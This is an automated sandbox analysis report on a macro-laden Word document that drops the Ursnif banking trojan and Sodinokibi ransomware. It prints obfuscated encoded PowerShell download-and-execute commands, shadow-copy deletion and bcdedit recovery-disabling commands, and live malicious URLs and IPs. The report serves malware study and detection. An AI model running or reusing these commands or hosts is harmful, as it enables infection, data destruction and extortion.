File name:

info_17.07.doc

Full analysis: https://app.any.run/tasks/52eca730-95ed-425c-bdcc-9ea47ccb5722
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: July 17, 2019, 10:30:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
gozi
ursnif
loader
ransomware
sodinokibi
trojan
dreambot
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: kmpfeasehdkgzczvykoqteekl, Subject: fmupxymxyqxqmytcgdllcpopjg, Comments: xyghftkvgkrfmucd, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Tue Jul 16 21:40:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

70D38D27BB438DD5712A942BCDE3378F

SHA1:

E184ED54102D237E1DA605FAF2BD451FEE5D1CA4

SHA256:

C1A4878CBD32046E2FD73BBD910C62354C22BA5E53F10451420FD2F7E778A90C

SSDEEP:

768:Ez+jGjZE2kXC8954mXbYhQ2F+JOXvfjhqML7I3livNe+NotIgUdS37e3yrPkQK7h:E6jGjrm5Xfh83jhVs3sE+No2g97Cy2/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3488)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2748)

    • Application was dropped or rewritten from another process

      • aGpPDP.exe (PID: 2392)

    • Sodinokibi keys found

      • powershell.exe (PID: 1924)

    • Sodinokibi ransom note found

      • powershell.exe (PID: 1924)

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3488)

    • URSNIF was detected

      • powershell.exe (PID: 2748)
      • iexplore.exe (PID: 232)

    • Dropped file may contain instructions of ransomware

      • powershell.exe (PID: 1924)

    • Renames files like Ransomware

      • powershell.exe (PID: 1924)

    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 3232)

    • Changes settings of System certificates

      • powershell.exe (PID: 1924)

    • Deletes shadow copies

      • cmd.exe (PID: 3232)

    • Connects to CnC server

      • iexplore.exe (PID: 232)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2748)
      • powershell.exe (PID: 1924)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2748)

    • Executed via COM

      • unsecapp.exe (PID: 2776)
      • iexplore.exe (PID: 2164)

    • Application launched itself

      • powershell.exe (PID: 2748)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1924)

    • Creates files in the program directory

      • powershell.exe (PID: 1924)

    • Creates files like Ransomware instruction

      • powershell.exe (PID: 1924)

    • Executed as Windows Service

      • vssvc.exe (PID: 3676)

    • Adds / modifies Windows certificates

      • powershell.exe (PID: 1924)

    • Executes PowerShell scripts

      • powershell.exe (PID: 2748)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3488)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3488)
      • iexplore.exe (PID: 232)

    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 1924)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2748)

    • Changes internet zones settings

      • iexplore.exe (PID: 2164)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 232)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: kmpfeasehdkgzczvykoqteekl
Subject: fmupxymxyqxqmytcgdllcpopjg
Author: -
Keywords: -
Comments: xyghftkvgkrfmucd
Template: Normal
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:04:25 21:21:00
ModifyDate: 2019:07:16 20:40:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Manager: -
Company: -
Bytes: 22528
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • kmpfeasehdkgzczvykoqteekl
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
12
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs #URSNIF powershell.exe agppdp.exe no specs #SODINOKIBI powershell.exe unsecapp.exe no specs cmd.exe no specs vssadmin.exe no specs vssvc.exe no specs bcdedit.exe no specs bcdedit.exe no specs iexplore.exe #URSNIF iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
232"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2164 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1924"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAUgBiADQASQB3AEYASQBYAGYAbAArAHcALwA5AEkARwBsAEUARwBjAEoARABxAE4AQwB5AEwASwBJAE0AVwBRAEcAagBiAHEANABaAEYAdABpAHcAUQBMAGQAQwBtADEAbwBGAFIAbgB4AHYANAA4AGwANgB2AFoAeQA3ADgAcwA1ADkANQA3AHYAYQBFAEUAZABDAFAAeQA4AEEAaAA2AEEAZQBDAG8AVwAvAGcASwA2ADIAbwB1AG8AeABHAGIAagBhAGEAUQA0AE8ASAB0AEoAUwBsAEgAeQBoAEQATABTAGcAZQArAHcAbwA1ADAATgBIAFkAagBJAGsAYgBSAGkAYgBpAGUAagBsADUAMgBIAGQARgBqAEEARABpAFIAVgBsADcAYwByACsAaQBTAHgAZwBnAFkASQB5AFgAYQA5AFIAUgBzAFMAYgBjAGMAegBTAHMASwAxAHEAeAAzADIAUwAzAC8AKwA5AEQAMwAyAFkASwBhAFUAYwBFAHcAegBpAFgARgBlAE0AMABaAG8AVgBPAEsATQA1AGsAaAB4AFkAYwBxADYANABtAGEAUwBjAGwANABoAGsAWQBsAEgANQB1ADIATwBNAGMATgBTADkAbABGADYAWgBCAEIASgB3AGEAagBTADQAUgAwADAAMwBJAFMAWABCAE0AZQBaAHIAZwBVAEwAawBkAHMAaAAzAFEAQgBhAGcATwBzAFQAbwAxAEYAbAAzAFoAdwBqAEkAcAA5AFgASQBlAFAAWQBUAHcASQAyACsAVABQAGMAZwB6AE8AdgA0AFEAWQBKADAAUABVAFcAWgBFAHAAVQBOADIAZwBwAEYARwBsAEgAMwBtAEoAYwBGAEkAaABOAHcAcQBuAEsAUQBEAGMAbABvAEQAYwBhAEQAQQB6AFEAdgBQAGsAVQBwAHcAVwBYAGkAcwBZAFMATABVAG8AZQBFAHkAawAvAEgARwBlADEAeABrAHUAbABYAHkAOQBIAGIAYwBvAHYAOQAzAFMASwBzAFkAcQB6ADUAbgBSAHkAUQBUAEIANQAxAGYAOABGAEsAMgBaAHoANwBLADkAVQBHAFIAUwBwAGYAbQBuAEcARwB2AGEAUgBOAFgAcABBAGwAbQAyAGgAbgBqADAAMABVAC8AbgBiAEIAagBRAE0AOQAvAGIAbQBCAHcAPQA9ACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBlAHMAcwBJAE8ATgBNAE8ARABFAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAEUAQQBEAEUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAGEAZAB0AG8AZQBuAGQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAJwArACcARQAnACAAKwAgACcAWAAnACkA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2164"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2392"C:\Users\admin\aGpPDP.exe" C:\Users\admin\aGpPDP.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\agppdp.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2732vssadmin.exe Delete Shadows /All /Quiet C:\Windows\system32\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\vssadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2748"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAUgBiADQASQB3AEYASQBYAGYAbAArAHcALwA5AEkARwBsAEUARwBjAEoARABxAE4AQwB5AEwASwBJAE0AVwBRAEcAagBiAHEANABaAEYAdABpAHcAUQBMAGQAQwBtADEAbwBGAFIAbgB4AHYANAA4AGwANgB2AFoAeQA3ADgAcwA1ADkANQA3AHYAYQBFAEUAZABDAFAAeQA4AEEAaAA2AEEAZQBDAG8AVwAvAGcASwA2ADIAbwB1AG8AeABHAGIAagBhAGEAUQA0AE8ASAB0AEoAUwBsAEgAeQBoAEQATABTAGcAZQArAHcAbwA1ADAATgBIAFkAagBJAGsAYgBSAGkAYgBpAGUAagBsADUAMgBIAGQARgBqAEEARABpAFIAVgBsADcAYwByACsAaQBTAHgAZwBnAFkASQB5AFgAYQA5AFIAUgBzAFMAYgBjAGMAegBTAHMASwAxAHEAeAAzADIAUwAzAC8AKwA5AEQAMwAyAFkASwBhAFUAYwBFAHcAegBpAFgARgBlAE0AMABaAG8AVgBPAEsATQA1AGsAaAB4AFkAYwBxADYANABtAGEAUwBjAGwANABoAGsAWQBsAEgANQB1ADIATwBNAGMATgBTADkAbABGADYAWgBCAEIASgB3AGEAagBTADQAUgAwADAAMwBJAFMAWABCAE0AZQBaAHIAZwBVAEwAawBkAHMAaAAzAFEAQgBhAGcATwBzAFQAbwAxAEYAbAAzAFoAdwBqAEkAcAA5AFgASQBlAFAAWQBUAHcASQAyACsAVABQAGMAZwB6AE8AdgA0AFEAWQBKADAAUABVAFcAWgBFAHAAVQBOADIAZwBwAEYARwBsAEgAMwBtAEoAYwBGAEkAaABOAHcAcQBuAEsAUQBEAGMAbABvAEQAYwBhAEQAQQB6AFEAdgBQAGsAVQBwAHcAVwBYAGkAcwBZAFMATABVAG8AZQBFAHkAawAvAEgARwBlADEAeABrAHUAbABYAHkAOQBIAGIAYwBvAHYAOQAzAFMASwBzAFkAcQB6ADUAbgBSAHkAUQBUAEIANQAxAGYAOABGAEsAMgBaAHoANwBLADkAVQBHAFIAUwBwAGYAbQBuAEcARwB2AGEAUgBOAFgAcABBAGwAbQAyAGgAbgBqADAAMABVAC8AbgBiAEIAagBRAE0AOQAvAGIAbQBCAHcAPQA9ACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBlAHMAcwBJAE8ATgBNAE8ARABFAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAEUAQQBEAEUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAGEAZAB0AG8AZQBuAGQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAJwArACcARQAnACAAKwAgACcAWAAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2776C:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\wbem\unsecapp.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Sink to receive asynchronous callbacks for WMI client application
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\unsecapp.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3072bcdedit /set {default} recoveryenabled No C:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Boot Configuration Data Editor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3232"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresC:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3308bcdedit /set {default} bootstatuspolicy ignoreallfailuresC:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Boot Configuration Data Editor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
2 304
Read events
1 710
Write events
586
Delete events
8

Modification events

(PID) Process:(3488) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:n,>
Value:
6E2C3E00A00D0000010000000000000000000000
(PID) Process:(3488) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3488) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3488) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1324417054
(PID) Process:(3488) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1324417168
(PID) Process:(3488) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1324417169
(PID) Process:(3488) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
A00D0000F4F494BB8A3CD50100000000
(PID) Process:(3488) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:7->
Value:
372D3E00A00D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3488) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:7->
Value:
372D3E00A00D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3488) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
1
Suspicious files
166
Text files
14
Unknown types
12

Dropped files

PID
Process
Filename
Type
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE84E.tmp.cvr
MD5:
SHA256:
2748powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X7XQ345ORSQG8O6CF020.temp
MD5:
SHA256:
1924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q999VH0W7L8W1MD4Z9TS.temp
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF495A3BE37B43E32A.TMP
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF974A5EFDE3C94C98.TMP
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFF88ED3C2D7DF569F.TMP
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$fo_17.07.docpgc
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
2748powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
1924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11122d.TMPbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
19
DNS requests
14
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
232
iexplore.exe
GET
301
13.77.161.179:80
http://microsoft.com/images/xCQOEaIjB22l7d3ZsmG/3uINFgahz66VJugaY0uqff/SJL2GHRu_2Ft_/2FNAREKt/gFtKJHeQXFb3C3nHAn9DHPv/jW_2BUj8sy/vPO0FgOOGjT1VH5ep/4VzNBqxSbEN9/_2B0DN2VFaj/NxOA8zZMR_2FQy/uVjTNX_2BKa/CO.avi
US
whitelisted
1924
powershell.exe
GET
200
185.193.141.248:80
http://185.193.141.248/gs.php
RU
text
406 b
suspicious
2748
powershell.exe
GET
200
185.193.141.146:80
http://fcamylleibrahim.top/sywo/fgoow.php?l=dxclass5.gxl
RU
executable
472 Kb
malicious
2164
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
1924
powershell.exe
GET
200
2.16.186.56:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
unknown
compressed
56.3 Kb
whitelisted
1924
powershell.exe
GET
200
2.16.186.56:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E.crt
unknown
der
993 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2748
powershell.exe
185.193.141.248:80
IT Mir LLC
RU
suspicious
1924
powershell.exe
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared
1924
powershell.exe
185.193.141.248:80
IT Mir LLC
RU
suspicious
1924
powershell.exe
94.231.107.137:443
trivselsguide.dk
Zitcom A/S
DK
suspicious
1924
powershell.exe
208.113.140.37:443
production-stills.co.uk
New Dream Network, LLC
US
unknown
2164
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
232
iexplore.exe
13.77.161.179:80
microsoft.com
Microsoft Corporation
US
whitelisted
2748
powershell.exe
185.193.141.146:80
fcamylleibrahim.top
IT Mir LLC
RU
suspicious
2748
powershell.exe
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared
232
iexplore.exe
2.18.233.62:443
www.microsoft.com
Akamai International B.V.
whitelisted

DNS requests

Domain
IP
Reputation
fcamylleibrahim.top
  • 185.193.141.146
malicious
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
malicious
trivselsguide.dk
  • 94.231.107.137
suspicious
production-stills.co.uk
  • 208.113.140.37
suspicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
microsoft.com
  • 13.77.161.179
  • 40.113.200.201
  • 104.215.148.63
  • 40.112.72.205
  • 40.76.4.15
whitelisted
www.microsoft.com
  • 2.18.233.62
whitelisted
logosindustries.com
  • 209.97.129.7
suspicious
www.logosindustries.com
  • 209.97.129.7
malicious
tilldeeke.de
  • 95.143.172.245
malicious

Threats

PID
Process
Class
Message
1044
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2748
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2748
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2748
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2748
powershell.exe
Misc activity
ET INFO Possible EXE Download From Suspicious TLD
2748
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1924
powershell.exe
A Network Trojan was detected
ET INFO PowerShell DownloadString Command Common In Powershell Stagers
232
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
info_17.07.doc